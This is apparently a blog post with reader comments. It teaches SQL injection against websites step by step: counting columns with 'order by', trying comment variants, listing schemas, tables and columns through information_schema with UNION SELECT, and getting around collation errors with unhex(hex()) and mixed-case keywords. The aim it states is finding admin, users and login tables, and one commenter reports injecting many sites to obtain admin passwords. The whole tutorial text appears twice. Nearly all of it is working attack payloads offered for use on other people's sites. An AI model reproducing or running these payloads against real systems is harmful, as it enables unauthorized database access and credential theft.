Some days ago I posted a highly detailed post in SQL Injection. Check the post from here.
When we Sqli in a website we find many problems which are not familiar to us. Today I show you some of this problems and its solutions.
ok so here are some simple solutions of some simple problems (sql injection)
first (if "order by" is not working" )
so you have a vulnerable site
Code: site.com/index.php?id=1
but the problem is that order by is not working
you entered this command:-
Code: site.com/index.php?id=1 order by 1--
<< no eror
Code: site.com/index.php?id=1 order by 5--
<<no eror
Code: site.com/index.php?id=1 order by 100--
<< no eror.. !!!
if you get this problem then use sqli string based and put this command:-
Code:
site.com/index.php?id=1' order by 1--+-
<<no eror
Code: site.com/index.php?id=1' order by 5--+-
<<no eror
Code: site.com/index.php?id=1' order by 100--+-
<<eror
(note): you can see i have also putted a single qoute (') at the place (id=1')<<so be carefull about this
* some times if you get problems by using order by e.g
Code: site.com/index.php?id=1 order by 100--
<<no eror
or
Code: site.com/index.php?id=1 order by 1--
<<eror
then try to change the query like this
Code: site.com/index.php?id=1 order by 1/*
site.com/index.php?id=1 order by 5/*
here are some more quries like:
Code:
-- - ,, --++- ,, -++--,,
* ok while injecting a site if you see that there are no usefull table
like (admin,auth,users,members,login) etc then remember every site have different number of schemas
and there are different tables in every schema and you will get schema names by this command:-
Code:
site.com/index.php?id=1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata
and then tables from different schema using this:-
Code:
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x<hex value of schema name>
column names:-
Code:
site.com/index.php?id=1 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x<hex value of schema name> and table_name=0x<hex value of table name>
hope it will help you
Most sites has the problem when you try to get table names and it gives syntax eror
e.g you used this command:-
Code:
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables
and it give syntax error like you have error near at line..blah blah
on this condition you have to use different methods until your success
am writing down some of these commands:-
Code:
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables limit 0,1--
site.com/index.php?id=1 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1
site.com/index.php?id=1 union select 1,2,table_name,4 from information_schema.tables limit 0,1--
hope it will help you
* sometimes while using "union select " you can get this error
Code:
illegal mix of collection
or something like this
then you should use this method:-
Code:
site.com/index.php?id=1 union select 1,2,convert(version() using latin1),4--
current user:-
Code:
site.com/index.php?id=1 union select 1,2,convert(user() using latin1),4--
or
Code:
site.com/index.php?id=1 union select 1,2,unhex(hex(@@version)),4--
Code:
site.com/index.php?id=1 union select 1,2,unhex(hex(user())),4--
mostly unhex(hex)) use to bypass illegal mix of collection error..
if still not working then you should use this:-
Code:
site.com/index.php?id=1 UnIoN SeLeCt 1,2,unhex(hex(@@version))),4--
hope it will help you..
When we Sqli in a website we find many problems which are not familiar to us. Today I show you some of this problems and its solutions.
ok so here are some simple solutions of some simple problems (sql injection)
first (if "order by" is not working" )
so you have a vulnerable site
Code: site.com/index.php?id=1
but the problem is that order by is not working
you entered this command:-
Code: site.com/index.php?id=1 order by 1--
<< no eror
Code: site.com/index.php?id=1 order by 5--
<<no eror
Code: site.com/index.php?id=1 order by 100--
<< no eror.. !!!
if you get this problem then use sqli string based and put this command:-
Code:
site.com/index.php?id=1' order by 1--+-
<<no eror
Code: site.com/index.php?id=1' order by 5--+-
<<no eror
Code: site.com/index.php?id=1' order by 100--+-
<<eror
(note): you can see i have also putted a single qoute (') at the place (id=1')<<so be carefull about this
* some times if you get problems by using order by e.g
Code: site.com/index.php?id=1 order by 100--
<<no eror
or
Code: site.com/index.php?id=1 order by 1--
<<eror
then try to change the query like this
Code: site.com/index.php?id=1 order by 1/*
site.com/index.php?id=1 order by 5/*
here are some more quries like:
Code:
-- - ,, --++- ,, -++--,,
* ok while injecting a site if you see that there are no usefull table
like (admin,auth,users,members,login) etc then remember every site have different number of schemas
and there are different tables in every schema and you will get schema names by this command:-
Code:
site.com/index.php?id=1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata
and then tables from different schema using this:-
Code:
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x<hex value of schema name>
column names:-
Code:
site.com/index.php?id=1 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x<hex value of schema name> and table_name=0x<hex value of table name>
hope it will help you
Most sites has the problem when you try to get table names and it gives syntax eror
e.g you used this command:-
Code:
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables
and it give syntax error like you have error near at line..blah blah
on this condition you have to use different methods until your success
am writing down some of these commands:-
Code:
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables limit 0,1--
site.com/index.php?id=1 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1
site.com/index.php?id=1 union select 1,2,table_name,4 from information_schema.tables limit 0,1--
hope it will help you
* sometimes while using "union select " you can get this error
Code:
illegal mix of collection
or something like this
then you should use this method:-
Code:
site.com/index.php?id=1 union select 1,2,convert(version() using latin1),4--
current user:-
Code:
site.com/index.php?id=1 union select 1,2,convert(user() using latin1),4--
or
Code:
site.com/index.php?id=1 union select 1,2,unhex(hex(@@version)),4--
Code:
site.com/index.php?id=1 union select 1,2,unhex(hex(user())),4--
mostly unhex(hex)) use to bypass illegal mix of collection error..
if still not working then you should use this:-
Code:
site.com/index.php?id=1 UnIoN SeLeCt 1,2,unhex(hex(@@version))),4--
hope it will help you..
Why if there's no error with 'order by 1--' but there's one with 'order by 2--' ?
ReplyDeletethen collumn number is one..
ReplyDeleteBut there's an error with 'union all select 1--'
ReplyDeletebrother..
ReplyDeletei have inject many site. but now i find some site that are not working admin id password. what can i do?? :(